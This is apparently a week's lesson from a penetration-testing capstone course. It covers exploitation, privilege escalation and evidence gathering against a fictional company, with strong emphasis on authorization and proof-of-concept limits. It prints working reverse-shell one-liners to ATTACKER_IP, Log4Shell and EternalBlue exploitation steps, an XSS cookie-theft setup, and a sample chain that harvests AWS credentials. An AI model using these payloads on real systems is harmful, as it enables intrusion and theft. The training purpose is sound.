CSY399 Week 05 Capstone

Week Content

Cybersecurity Capstone

Track your progress through this week's content

Mental Model

"The goal of exploitation is proof, not destruction. A single screenshot of domain admin access tells a more compelling story than a hundred vulnerability scan results." — Penetration Testing Principle

Exploitation transforms theoretical vulnerabilities into demonstrated risk. While vulnerability scanners identify potential weaknesses, exploitation proves they're real and shows exactly what an attacker could achieve. This evidence drives remediation priority and executive attention in ways that CVSS scores alone cannot.

Learning Outcomes

By the end of this week, you will be able to:

  • LO1: Execute controlled exploitation of validated vulnerabilities using industry-standard frameworks
  • LO2: Demonstrate privilege escalation techniques on compromised systems
  • LO3: Document exploitation chains with clear proof-of-concept evidence
  • LO4: Apply ethical boundaries and safety controls during active exploitation
  • LO5: Correlate exploitation success with business impact for risk communication

Introduction: From Identification to Proof

Over the past two weeks, you've identified vulnerabilities across NovaTech's infrastructure and web applications. Your scanner reports show critical and high findings. But stakeholders often question: "Could someone actually exploit this? What would happen if they did?"

This week answers those questions. Controlled exploitation demonstrates that vulnerabilities aren't just theoretical—they represent real paths to compromise. Your goal isn't to cause damage but to prove impact in a way that drives action.

Critical: Ethical Boundaries

Exploitation carries inherent risk. Before proceeding, ensure:

  • You have explicit written authorization for exploitation testing
  • You understand and will stay within defined scope boundaries
  • You have emergency contacts ready if something goes wrong
  • You will stop immediately if you cause unintended impact
  • You will not access, modify, or exfiltrate actual customer data
  • You document everything for transparency and accountability

1. Exploitation Fundamentals

Exploitation is the process of leveraging a vulnerability to achieve an unauthorized outcome—typically code execution, data access, or privilege escalation. Understanding exploitation mechanics helps you both execute attacks effectively and explain findings to stakeholders.

The Exploitation Lifecycle

┌─────────────────────────────────────────────────────────────────┐
│                    EXPLOITATION LIFECYCLE                       │
├─────────────────────────────────────────────────────────────────┤
│                                                                 │
│  ┌──────────┐    ┌──────────┐    ┌──────────┐    ┌──────────┐  │
│  │ IDENTIFY │───▶│ VALIDATE │───▶│ EXPLOIT  │───▶│ POST-    │  │
│  │          │    │          │    │          │    │ EXPLOIT  │  │
│  └──────────┘    └──────────┘    └──────────┘    └──────────┘  │
│       │              │               │               │          │
│       ▼              ▼               ▼               ▼          │
│  Vulnerability   Confirm vuln    Gain initial   Escalate,      │
│  scanning        exists and      access or      pivot,         │
│  (Weeks 3-4)     is exploitable  achieve goal   demonstrate    │
│                                                 impact         │
│                                                                 │
│  KEY QUESTIONS AT EACH STAGE:                                  │
│  ─────────────────────────────                                 │
│  Identify:   What might be vulnerable?                         │
│  Validate:   Is this actually exploitable in this context?     │
│  Exploit:    Can I gain access/control?                        │
│  Post:       What can I do from here? How far can I go?        │
│                                                                 │
└─────────────────────────────────────────────────────────────────┘

Types of Exploitation Outcomes

Remote Code Execution (RCE)

The ability to execute arbitrary commands on a remote system. Considered the most severe exploitation outcome as it typically leads to full system compromise.

Example: Exploiting Log4Shell to execute commands on the Jenkins server, gaining shell access as the application user.

Authentication Bypass

Gaining access to a system or application without valid credentials. May provide immediate access to sensitive functionality or data.

Example: Exploiting a JWT algorithm confusion vulnerability to forge authentication tokens.

Privilege Escalation

Elevating from a lower-privilege context to higher privileges. Can be local (user to root) or application-level (user to admin).

Example: Exploiting a misconfigured sudo rule to escalate from web application user to root.

Data Access

Unauthorized access to sensitive information through vulnerabilities like SQL injection, IDOR, or file inclusion.

Example: Using SQL injection to extract the user database including password hashes.

Lateral Movement

Moving from one compromised system to access additional systems. Demonstrates how initial compromise can spread through the network.

Example: Using credentials found on Jenkins to access AWS resources or internal systems.

Proof-of-Concept vs. Full Exploitation

In professional assessments, the goal is proving impact, not maximizing damage. This distinction is critical:

Aspect Proof-of-Concept (PoC) Full Exploitation
Goal Demonstrate vulnerability is exploitable Achieve maximum impact/access
Scope Minimum necessary to prove the point Comprehensive compromise
Data Access Show access is possible; don't exfiltrate Extract/modify data
Persistence Typically not installed Establish ongoing access
Risk Level Lower (controlled, limited) Higher (more potential for damage)
Appropriate For Most security assessments Red team exercises with explicit scope

Assessment Standard: Proof-of-Concept

For NovaTech's engagement, use PoC exploitation. Your goal is demonstrating risk, not simulating a full attack. If you achieve code execution, capture evidence (whoami, hostname, screenshot) and stop. Don't pivot through the entire network or access production customer data.

2. Exploitation Tools and Frameworks

Several frameworks streamline the exploitation process by providing exploit code, payload generation, and post-exploitation capabilities.

Metasploit Framework

Metasploit is the most widely-used exploitation framework, providing a structured approach to vulnerability exploitation with extensive module libraries.

Metasploit Architecture

┌─────────────────────────────────────────────────────────────────┐
│                   METASPLOIT ARCHITECTURE                       │
├─────────────────────────────────────────────────────────────────┤
│                                                                 │
│  EXPLOITS              PAYLOADS             AUXILIARY           │
│  ────────              ────────             ─────────           │
│  Code that triggers    Code executed        Non-exploit         │
│  vulnerabilities       after successful     modules: scanners,  │
│                        exploitation         fuzzers, etc.       │
│                                                                 │
│  Examples:             Examples:            Examples:           │
│  • exploit/windows/    • windows/           • auxiliary/        │
│    smb/ms17_010         meterpreter/         scanner/ssh/       │
│  • exploit/multi/       reverse_tcp          ssh_login          │
│    http/log4shell     • linux/x64/         • auxiliary/        │
│                         shell_reverse_tcp    gather/enum_dns    │
│                                                                 │
│  POST-EXPLOITATION     ENCODERS             NOPS                │
│  ─────────────────     ────────             ────                │
│  Actions after         Obfuscate payloads   NOP sled            │
│  initial compromise    to evade detection   generators          │
│                                                                 │
└─────────────────────────────────────────────────────────────────┘

Basic Metasploit Workflow

# Start Metasploit console
msfconsole

# Search for exploits
msf6> search log4shell
msf6> search type:exploit platform:linux smb

# Select an exploit
msf6> use exploit/multi/http/log4shell_header_injection

# View required options
msf6> show options
msf6> show info

# Set target and payload options
msf6> set RHOSTS target.novatech-solutions.com
msf6> set RPORT 8080
msf6> set LHOST your-ip-address
msf6> set LPORT 4444

# Select payload
msf6> set PAYLOAD linux/x64/shell_reverse_tcp

# Verify settings
msf6> show options

# Execute exploit
msf6> exploit
# or
msf6> run

Meterpreter Basics

Meterpreter is an advanced payload providing an interactive shell with extensive post-exploitation capabilities. 

# Once Meterpreter session established:
meterpreter> sysinfo           # System information
meterpreter> getuid            # Current user
meterpreter> pwd               # Current directory
meterpreter> ls                # List files

# Privilege escalation
meterpreter> getsystem         # Attempt to elevate (Windows)

# Network information
meterpreter> ipconfig          # Network interfaces
meterpreter> route             # Routing table
meterpreter> arp               # ARP cache

# Credential harvesting (with appropriate permissions)
meterpreter> hashdump          # Dump password hashes

# Screenshots and evidence
meterpreter> screenshot        # Capture screen
meterpreter> download file.txt # Download file for evidence

# Pivoting
meterpreter> run autoroute -s 10.10.10.0/24  # Add route for pivoting

# Clean exit
meterpreter> exit

Manual Exploitation Tools

Many exploits don't require frameworks. Simple tools combined with public exploit code are often sufficient.

Netcat (nc)

# Set up listener for reverse shell
nc -lvnp 4444

# Connect to bind shell
nc target 4444

# File transfer
# Receiver:
nc -lvnp 4444 > received_file
# Sender:
nc target 4444 < file_to_send

cURL for Web Exploitation

# SQL injection testing
curl "https://target/api/users?id=1' OR '1'='1"

# Header injection (Log4Shell example)
curl -H 'X-Api-Version: ${jndi:ldap://attacker:1389/a}' https://target/

# File upload bypass
curl -X POST -F "file=@shell.php;filename=shell.php.jpg" https://target/upload

# Authentication bypass attempts
curl -X POST -d '{"admin":true}' -H "Content-Type: application/json" https://target/api/user

Python Exploit Scripts

# Many public exploits are Python scripts
# Example usage pattern:

# Find exploit
searchsploit "apache struts"
searchsploit -m 45010   # Copy exploit to current directory

# Review exploit code BEFORE running
cat 45010.py

# Install dependencies if needed
pip install requests

# Run exploit
python 45010.py https://target

Reverse Shells

A reverse shell connects from the target back to your machine, bypassing firewall restrictions on inbound connections. 

┌─────────────────────────────────────────────────────────────────┐
│                    REVERSE SHELL CONCEPT                        │
├─────────────────────────────────────────────────────────────────┤
│                                                                 │
│   ATTACKER                              TARGET                  │
│   ────────                              ──────                  │
│   ┌─────────────┐                    ┌─────────────┐           │
│   │   Listener  │◄───────────────────│   Shell     │           │
│   │   (nc -lvnp │    Outbound        │   Process   │           │
│   │    4444)    │    Connection      │             │           │
│   └─────────────┘                    └─────────────┘           │
│                                                                 │
│   1. Attacker starts listener on port 4444                     │
│   2. Exploit triggers shell on target                          │
│   3. Target initiates OUTBOUND connection to attacker          │
│   4. Attacker receives shell, can execute commands             │
│                                                                 │
│   ADVANTAGE: Bypasses inbound firewall rules                   │
│   (Most firewalls allow outbound connections)                  │
│                                                                 │
└─────────────────────────────────────────────────────────────────┘

Common Reverse Shell Payloads

# Bash reverse shell
bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1

# Python reverse shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKER_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'

# PHP reverse shell
php -r '$sock=fsockopen("ATTACKER_IP",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

# PowerShell reverse shell (Windows)
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('ATTACKER_IP',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

# Resource: https://www.revshells.com/ - Reverse shell generator

3. Infrastructure Exploitation Scenarios

Based on your Week 3 vulnerability assessment, several NovaTech systems present exploitation opportunities. This section covers common scenarios you might encounter.

Scenario 1: Exploiting Vulnerable Services

EternalBlue (MS17-010) Exploitation

If your scans identified Windows systems vulnerable to EternalBlue, this SMB vulnerability provides reliable remote code execution. 

# Metasploit exploitation
msf6> use exploit/windows/smb/ms17_010_eternalblue
msf6> set RHOSTS 10.10.10.50
msf6> set LHOST your-ip
msf6> set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6> exploit

# On success, you'll get a Meterpreter session
meterpreter> getuid
Server username: NT AUTHORITY\SYSTEM

# Document the access
meterpreter> sysinfo
meterpreter> ipconfig
meterpreter> screenshot
Evidence to Capture
  • Screenshot of Meterpreter session establishing
  • getuid output showing SYSTEM access
  • sysinfo output confirming target hostname
  • ipconfig showing network position

SSH Credential Exploitation

If weak SSH credentials were identified, demonstrate access: 

# Simple SSH access with discovered credentials
ssh admin@10.10.10.100

# Document access
$ whoami
admin
$ hostname
nova-server-01
$ id
uid=1000(admin) gid=1000(admin) groups=1000(admin),27(sudo)
$ cat /etc/os-release

Scenario 2: Web Application Exploitation

SQL Injection to Data Access

Exploit confirmed SQL injection to demonstrate data access: 

# Using sqlmap with previously identified injection point
sqlmap -u "https://api.workflowpro.io/api/search?q=test" \
  --cookie="session=abc123" \
  --batch --dbs

# Enumerate databases
available databases [3]:
[*] information_schema
[*] workflowpro
[*] mysql

# Enumerate tables (proof of access)
sqlmap -u "https://api.workflowpro.io/api/search?q=test" \
  --cookie="session=abc123" \
  --batch -D workflowpro --tables

# Show table structure (DON'T dump actual data)
sqlmap -u "https://api.workflowpro.io/api/search?q=test" \
  --cookie="session=abc123" \
  --batch -D workflowpro -T users --columns

# Document: You CAN access the users table
# DO NOT: Dump actual user data
Ethical Boundary

Demonstrate you CAN access data; don't actually extract customer information. Show table names and column structures as proof. If you must show data access, use LIMIT 1 and redact any PII in your report.

XSS to Session Hijacking (Proof of Concept)

# Set up listener to receive stolen cookies
# Using netcat:
nc -lvnp 8888

# Or using Python HTTP server with logging:
python3 -m http.server 8888

# Inject XSS payload that sends cookies to your server
# Payload (URL encoded for delivery):


# When victim views the page, you receive:
GET /steal?c=session=abc123;user_token=xyz789 HTTP/1.1

# Document: Cookie received proves session hijacking is possible
# DO NOT: Actually use the stolen cookie to access victim's account

Scenario 3: Log4Shell (CVE-2021-44228)

Log4Shell Exploitation

If Jenkins or other Java applications are vulnerable to Log4Shell: 

# Method 1: Using Metasploit
msf6> use exploit/multi/http/log4shell_header_injection
msf6> set RHOSTS jenkins.novatech-solutions.com
msf6> set RPORT 8080
msf6> set TARGETURI /
msf6> set SRVHOST your-ip
msf6> set SRVPORT 1389
msf6> set PAYLOAD linux/x64/shell_reverse_tcp
msf6> set LHOST your-ip
msf6> set LPORT 4444
msf6> exploit

# Method 2: Manual exploitation
# Start LDAP listener (using various tools like rogue-jndi)
java -jar target/RogueJndi-1.1.jar --command "curl http://ATTACKER/callback" \
  --hostname your-ip

# Inject payload via vulnerable header
curl -H 'X-Forwarded-For: ${jndi:ldap://your-ip:1389/o=reference}' \
  https://jenkins.novatech-solutions.com/

# Check for callback to confirm code execution

4. Privilege Escalation

Initial exploitation often provides limited access. Privilege escalation elevates your access to demonstrate full compromise potential.

Linux Privilege Escalation

Enumeration First

# Basic system enumeration
whoami
id
uname -a
cat /etc/os-release

# Find SUID binaries
find / -perm -4000 -type f 2>/dev/null

# Check sudo permissions
sudo -l

# Find writable directories
find / -writable -type d 2>/dev/null

# Check cron jobs
cat /etc/crontab
ls -la /etc/cron.*

# Look for credentials
cat ~/.bash_history
cat /etc/passwd
ls -la /home/

# Automated enumeration with LinPEAS
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

Common Linux Privilege Escalation Vectors

Vector Description Exploitation
Sudo misconfiguration User can run specific commands as root sudo -l, check GTFOBins for escalation
SUID binaries Programs running with owner privileges Find unusual SUID files, check GTFOBins
Writable /etc/passwd Can add new root user Add user with UID 0
Kernel exploits Vulnerabilities in Linux kernel DirtyPipe, DirtyCow (if old kernel)
Cron job exploitation Writable scripts in cron Modify script to execute as root
Credential harvesting Passwords in files/history Search for passwords, reuse for root

Example: Sudo Misconfiguration

# Check sudo permissions
$ sudo -l
User webadmin may run the following commands on nova-server:
    (ALL) NOPASSWD: /usr/bin/vim

# GTFOBins shows vim can escalate
$ sudo vim -c ':!/bin/bash'

# Now running as root
# whoami
root

Windows Privilege Escalation

Windows Enumeration

# Basic info
whoami
whoami /priv
whoami /groups
systeminfo

# Network info
ipconfig /all
netstat -an

# Users and groups
net user
net localgroup administrators

# Running services
tasklist /svc
wmic service get name,displayname,pathname,startmode

# Find unquoted service paths
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows"

# Automated enumeration with WinPEAS
# Download and run winPEASany.exe

Common Windows Privilege Escalation Vectors

Vector Description Exploitation
Unquoted service paths Service path without quotes allows injection Place executable in writable path segment
Weak service permissions Can modify service binary or config Replace binary or change path
AlwaysInstallElevated MSI files install with SYSTEM Create malicious MSI package
Token impersonation SeImpersonatePrivilege enabled PrintSpoofer, JuicyPotato
Credential harvesting Stored credentials, memory dumps Mimikatz, registry extraction
UAC bypass Bypass User Account Control Various techniques depending on version

Example: Token Impersonation with PrintSpoofer

# Check current privileges
whoami /priv
# Look for: SeImpersonatePrivilege - Enabled

# Use PrintSpoofer to escalate
PrintSpoofer.exe -i -c cmd

# Now running as SYSTEM
C:\> whoami
nt authority\system

GTFOBins and LOLBAS

Essential resources for privilege escalation using legitimate binaries:

5. Post-Exploitation Evidence

The purpose of post-exploitation in an assessment is gathering evidence that demonstrates impact. What you document here drives remediation priority.

Evidence Collection Checklist

System Access Evidence

Privilege Escalation Evidence

Data Access Evidence

Lateral Movement Evidence

Documenting an Exploitation Chain

NOVA-EXPLOIT-001 Critical

Full System Compromise via Log4Shell → Privilege Escalation

Summary

Successful exploitation of Log4Shell vulnerability on Jenkins server combined with sudo misconfiguration resulted in root-level access to critical CI/CD infrastructure.

Attack Chain
┌────────────────┐    ┌────────────────┐    ┌────────────────┐
│  Log4Shell     │───▶│ Shell as       │───▶│  Root via      │
│  CVE-2021-44228│    │ 'jenkins' user │    │  sudo vim      │
└────────────────┘    └────────────────┘    └────────────────┘
   CVSS: 10.0           Initial Access        Full Compromise

┌────────────────┐    ┌────────────────┐
│  AWS Keys      │───▶│  Potential     │
│  Discovered    │    │  Cloud Access  │
└────────────────┘    └────────────────┘
 Credential Theft      Lateral Movement
Step 1: Initial Exploitation
# Started listener
$ nc -lvnp 4444
listening on [any] 4444 ...

# Sent Log4Shell payload
$ curl -H 'X-Api-Version: ${jndi:ldap://ATTACKER:1389/Basic/ReverseShell/ATTACKER/4444}' \
  https://jenkins.novatech-solutions.com/

# Received connection
connect to [ATTACKER] from jenkins.novatech-solutions.com [54.85.xxx.xxx] 45892
$ whoami
jenkins
$ hostname
jenkins-prod-01

Evidence: evidence/NOVA-EXPLOIT-001-initial-shell.png

Step 2: Privilege Escalation
# Checked sudo permissions
$ sudo -l
User jenkins may run the following commands on jenkins-prod-01:
    (ALL) NOPASSWD: /usr/bin/vim

# Escalated via vim
$ sudo vim -c ':!/bin/bash'

# Verified root access
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)

Evidence: evidence/NOVA-EXPLOIT-001-root-access.png

Step 3: Impact Demonstration
# Located sensitive credentials
# cat /var/lib/jenkins/credentials.xml
# [REDACTED - Contains AWS access keys, SSH private keys]

# Verified AWS key validity (without performing actions)
# aws sts get-caller-identity
{
    "UserId": "AIDAXXXXXXXXXXXXXXXXX",
    "Account": "123456789012",
    "Arn": "arn:aws:iam::123456789012:user/jenkins-deploy"
}

# Listed accessible S3 buckets (read-only verification)
# aws s3 ls
2024-01-15 novatech-prod-data
2024-01-15 novatech-backups
2024-01-15 workflowpro-uploads

Evidence: evidence/NOVA-EXPLOIT-001-aws-access.png

Note: Did not access bucket contents. Verified access capability only.

Business Impact
  • CI/CD Compromise: Attacker could inject malicious code into software builds, affecting all WorkflowPro customers
  • Data Breach: AWS credentials provide access to production data buckets containing customer workflow data
  • Lateral Movement: SSH keys on Jenkins server could provide access to additional infrastructure
  • Supply Chain Risk: Compromised builds could distribute malware to enterprise customers
Remediation Priority: IMMEDIATE
  1. Patch Log4j on Jenkins server immediately
  2. Remove sudo vim permission; implement least-privilege sudo rules
  3. Rotate all AWS credentials stored on Jenkins
  4. Rotate all SSH keys on Jenkins
  5. Audit Jenkins build history for signs of tampering
  6. Implement secrets management (HashiCorp Vault, AWS Secrets Manager)

6. Safety and Ethics During Exploitation

Exploitation carries the highest risk of any assessment activity. Strict adherence to safety practices protects both you and the client.

Pre-Exploitation Checklist

During Exploitation

Know Your Exploit

Never run exploit code you don't understand. Review the code, understand what it does, and verify it won't cause unintended damage (DoS, data corruption, etc.).

Minimize Footprint

Achieve your proof-of-concept objective and stop. Don't install persistence mechanisms, don't dump entire databases, don't explore beyond what's needed to demonstrate impact.

Document Everything

Record all commands executed, all access obtained, all files touched. This protects you if questions arise later about what happened during testing.

Avoid Production Data

Demonstrate access without exfiltrating real customer data. Show that you CAN access the database; don't download all customer records.

Stop If Something Goes Wrong

If you cause unexpected impact—service crash, data corruption, alert storms—stop immediately and notify the client. Don't try to "fix it" yourself.

After Exploitation

Clean Up

Remove any files uploaded, shells deployed, or accounts created during testing. Document what you removed.

Secure Your Evidence

Evidence may contain sensitive information (credentials, data samples). Store it securely and handle according to engagement data handling requirements.

Report Critical Findings Immediately

Don't wait for the final report to tell the client you achieved root on their CI/CD server. Critical exploitation success warrants immediate notification.

Self-Check Questions

Test your understanding of exploitation concepts and practices:

Question 1

Your vulnerability scan identified MS17-010 (EternalBlue) on a Windows Server. Before attempting exploitation, what should you verify?

Reveal Answer

Before attempting exploitation, verify:

  1. Scope: The specific server is explicitly in scope for penetration testing (not just scanning)
  2. Stability: The EternalBlue exploit can be unstable; verify this isn't a production-critical system without recovery capability
  3. Authorization: Exploitation is covered in the engagement charter
  4. Timing: You're within authorized testing windows
  5. Validate the finding: Manually verify the vulnerability exists (scanner could be wrong)
  6. Backup plan: Know who to contact if exploitation crashes the service
  7. Documentation ready: Prepared to capture evidence immediately

Note: MS17-010 exploits can occasionally crash systems. On critical production servers, you might document the vulnerability without exploiting, noting it as "highly likely exploitable" based on version confirmation.

Question 2

You've achieved a reverse shell on a Linux server as the 'www-data' user. Running sudo -l shows no sudo permissions. What are your next steps for privilege escalation enumeration?

Reveal Answer

With no sudo access, enumerate other escalation vectors:

  1. SUID binaries: find / -perm -4000 -type f 2>/dev/null — Look for unusual SUID programs
  2. Writable files: find / -writable -type f 2>/dev/null — Check for writable scripts or configs
  3. Cron jobs: cat /etc/crontab, ls -la /etc/cron.* — Look for writable cron scripts
  4. Kernel version: uname -a — Check for kernel exploits (DirtyPipe, etc.)
  5. Credentials: Search for passwords in config files, history, environment variables
  6. Running processes: ps aux — Look for processes running as root that might be exploitable
  7. Capabilities: getcap -r / 2>/dev/null — Check for binaries with dangerous capabilities
  8. Automated: Run LinPEAS for comprehensive enumeration

Question 3

You've exploited SQL injection and can now read arbitrary data from the database. The database contains a 'users' table with 50,000 customer records including names, emails, and hashed passwords. How should you document this finding?

Reveal Answer

Document to prove impact without exposing customer data:

  • Show access capability: Document the SQL injection steps, the query used
  • Show table structure: SELECT column_name FROM information_schema.columns WHERE table_name='users'
  • Show record count: SELECT COUNT(*) FROM users — Proves scale of exposure
  • Sample with redaction: At most, show 1-2 rows with PII redacted: REDACTED@example.com
  • Hash analysis: Note the hashing algorithm (bcrypt, MD5, etc.) without cracking

Do NOT:

  • Dump all 50,000 records
  • Attempt to crack password hashes
  • Include unredacted customer data in your report
  • Exfiltrate the data to your systems

Question 4

Explain the difference between a "bind shell" and a "reverse shell." Why are reverse shells typically preferred in penetration testing?

Reveal Answer

Bind Shell:

  • Opens a listening port on the TARGET
  • Attacker connects TO the target
  • Requires inbound connection to target
  • Often blocked by firewalls

Reverse Shell:

  • Opens a listening port on the ATTACKER
  • Target connects back TO the attacker
  • Uses outbound connection from target
  • Often allowed by firewalls (outbound usually permitted)

Why reverse shells preferred:

  • Firewalls typically block inbound but allow outbound
  • NAT makes inbound connections to internal hosts difficult
  • Reverse shells work through most network configurations
  • Less likely to be noticed (looks like normal outbound traffic)

Question 5

You're attempting to exploit a vulnerability but the exploit keeps failing. You suspect network-based security controls are blocking your payloads. What steps can you take to diagnose and potentially bypass these controls?

Reveal Answer

Diagnostic and bypass steps:

  1. Confirm vulnerability exists: Does manual testing confirm the vuln without exploit payloads?
  2. Test connectivity: Can you reach the target on the required port? Test with simple ping/curl
  3. Test reverse shell connectivity: Can the target reach your listener? Try different ports (80, 443 often allowed)
  4. Payload encoding: Try encoding payloads (base64, URL encoding) to bypass signature detection
  5. Alternative payloads: Different payload types may evade detection (web_delivery vs staged)
  6. HTTPS: Encrypted connections may bypass inspection
  7. Smaller payloads: Stageless vs staged, simpler shells
  8. Alternative ports: Use common ports (80, 443, 8080) for reverse connections

Document regardless: If controls block exploitation, document the vulnerability as "confirmed but exploitation prevented by [control]." This still demonstrates the vulnerability exists and might be exploited if controls fail.

Question 6

After achieving root access on the Jenkins server, you discover AWS credentials that appear to have administrative access. What are the ethical boundaries for testing these credentials?

Reveal Answer

Ethical boundaries for discovered AWS credentials:

Acceptable:

  • Verify validity: aws sts get-caller-identity — confirms credentials work
  • Check permissions: aws iam list-attached-user-policies — understand access level
  • List resources: aws s3 ls, aws ec2 describe-instances — prove access exists

Not acceptable (without explicit scope expansion):

  • Download data from S3 buckets
  • Access EC2 instances not in original scope
  • Modify any AWS resources
  • Create new IAM users or roles
  • Access other AWS accounts
✓ Best practice

Document the credential discovery and demonstrate access capability. Notify client immediately—this may warrant scope expansion discussion. Don't proceed into AWS environment without explicit authorization update.

Lab: Controlled Exploitation Exercises

Objective

Perform controlled exploitation against practice targets, demonstrating proof-of-concept attacks and documenting exploitation chains with professional evidence.

Deliverables

Time Estimate

5-6 hours

Practice Targets

Use these intentionally vulnerable environments for safe exploitation practice:

Never practice exploitation against systems you don't own or have explicit permission to test.

Lab Tasks

Part 1: Environment Setup (LO4)

  1. Set up isolated network for vulnerable VMs (host-only or internal network)
  2. Deploy at least one vulnerable target (Metasploitable recommended)
  3. Verify network connectivity from Kali to target
  4. Start terminal logging: 
    script -a ~/engagements/lab/exploitation-log-$(date +%Y%m%d).txt
  5. Document your lab setup

Part 2: Vulnerability Identification (Review)

  1. Scan target for vulnerabilities: 
    nmap -sV --script vuln TARGET_IP
  2. Identify at least 3 exploitable vulnerabilities
  3. Research each vulnerability (CVE details, available exploits)
  4. Prioritize based on exploitability and impact

Part 3: Service Exploitation (LO1, LO3)

Exploit at least two different service vulnerabilities:

  1. Select first vulnerability and matching exploit
  2. Configure exploit in Metasploit or prepare manual exploit
  3. Execute exploitation attempt
  4. Capture evidence:
    • Screenshot of successful session
    • whoami / id output
    • hostname / sysinfo
  5. Repeat for second vulnerability
  6. Document failed attempts and why they failed

Part 4: Privilege Escalation (LO2)

  1. From initial shell, enumerate privilege escalation vectors
  2. Run enumeration script (LinPEAS or WinPEAS)
  3. Identify viable escalation path
  4. Execute privilege escalation
  5. Document:
    • Starting privilege level
    • Technique used
    • Final privilege level (root/SYSTEM)
    • Evidence screenshots

Part 5: Attack Chain Documentation (LO3, LO5)

  1. Select your most complete exploitation path
  2. Document as a full attack chain:
    • Initial vulnerability exploited
    • Initial access achieved
    • Privilege escalation method
    • Final access level
    • Potential impact (what could attacker do?)
  3. Create professional finding document using Week 5 template
  4. Include all evidence (screenshots, logs, commands)

Part 6: Cleanup and Reflection

  1. Exit all shells cleanly
  2. Document any artifacts left on target (and clean if possible)
  3. Stop terminal logging
  4. Review log for sensitive information to redact
  5. Complete weekly reflection

Self-Assessment Checklist

Exploitation Execution

  • ☐ At least 2 different vulnerabilities exploited
  • ☐ Both Metasploit and manual techniques attempted
  • ☐ Failed attempts documented with analysis
  • ☐ Proper payloads selected for target OS

Privilege Escalation

  • ☐ Enumeration performed systematically
  • ☐ Escalation vector identified and documented
  • ☐ Root/SYSTEM access achieved and proven
  • ☐ Technique explained clearly

Evidence Quality

  • ☐ All exploitation steps documented with timestamps
  • ☐ Screenshots clearly show access level
  • ☐ Commands and outputs captured
  • ☐ Attack chain diagram included

Professional Standards

  • ☐ Ethical boundaries respected
  • ☐ Cleanup performed after testing
  • ☐ Documentation suitable for client report
  • ☐ Business impact articulated

Portfolio Integration

Save your exploitation lab deliverables:

🎯 Hands-On Capstone Activities

Week 5 capstone activities - Exploitation Practice

🎯 Exploitation Practice Lab

Deliverable: Professional capstone component ready for portfolio
Time estimate: 4-8 hours

💡 Capstone Strategy: This work becomes your portfolio—make it job-interview ready.

Resources

Required

Metasploit Unleashed (Free Course)

Comprehensive free course on Metasploit Framework covering fundamentals through advanced exploitation techniques.

offsec.com/metasploit-unleashed 3-4 hours (selected modules)
Required

GTFOBins

Curated list of Unix binaries that can be used for privilege escalation, file transfer, and other exploitation techniques.

gtfobins.github.io 45 minutes (explore common binaries)
Optional

TryHackMe: Linux PrivEsc Room

Hands-on practice with Linux privilege escalation techniques in a guided environment.

tryhackme.com/room/linuxprivesc 2-3 hours

Weekly Reflection

Prompt

Reflect on the transition from vulnerability identification to active exploitation. How does successfully exploiting a vulnerability change your understanding of its risk compared to reading about it in a scanner report? How would you explain the difference to a non-technical executive?

Consider the ethical dimensions of exploitation testing. What safeguards did you employ during this week's lab? How do you balance the need to demonstrate impact against the responsibility to avoid harm? What would you do if, during a real engagement, you accidentally caused a system to crash?

Target length: 250-350 words

Week 05 Quiz

Test your understanding of the weekly concepts.

Format: 10 multiple-choice questions. Passing score: 70%. Time: Untimed.

Take Quiz